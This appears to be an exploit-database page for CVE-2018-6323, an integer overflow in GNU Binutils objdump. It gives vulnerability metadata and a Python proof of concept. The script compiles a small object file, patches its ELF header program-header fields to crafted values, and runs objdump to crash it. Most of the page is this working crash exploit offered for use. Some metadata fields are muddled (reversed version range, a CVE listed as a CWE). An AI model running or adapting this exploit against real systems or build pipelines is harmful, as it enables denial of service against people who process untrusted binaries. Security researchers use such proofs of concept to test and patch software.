header-logo
Suggest Exploit
vendor:
Binutils
by:
r4xis
7.8
CVSS
HIGH
Integer Overflow
190
CWE
Product Name: Binutils
Affected Version From: <2.29.1
Affected Version To: 2.26.1
Patch Exists: YES
Related CWE: CVE-2018-6323
CPE: 2.3:a:gnu:binutils:2.26.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2018-6323/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-6323/
Other Scripts: N/A
Platforms Tested: Ubuntu 16.04 32-bit
2018

Objdump – Integer Overflow Crash POC

An integer overflow vulnerability in the objdump utility of GNU Binutils 2.29.1 and earlier allows attackers to cause a denial of service (application crash) via a crafted ELF file, related to print_symbol.c and elfcode.h.

Mitigation:

Upgrade to GNU Binutils version 2.29.1 or later.
Source

Exploit-DB raw data:

# Exploit Title: Objdump - Integer Overflow Crash POC
# Date: 12.02.2018
# Exploit Author: r4xis
# Tested Version: 2.26.1
# Vuln Version: <2.29.1
# CVE: cve-2018-6323
# Tested on: Ubuntu 16.04 32-bit 
# Vulnerability Details: 
# https://www.cvedetails.com/cve/CVE-2018-6323/
# https://sourceware.org/bugzilla/show_bug.cgi?id=22746


import os

hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()

os.system("gcc -c helloWorld.c -o test")
# file test
# test: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped

f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()
# readelf -h test
# Number of program headers:         65535 (536870912)

os.system("objdump -x test; rm -r helloWorld.c test")

Navigation

Suggest Exploit

Services By CQR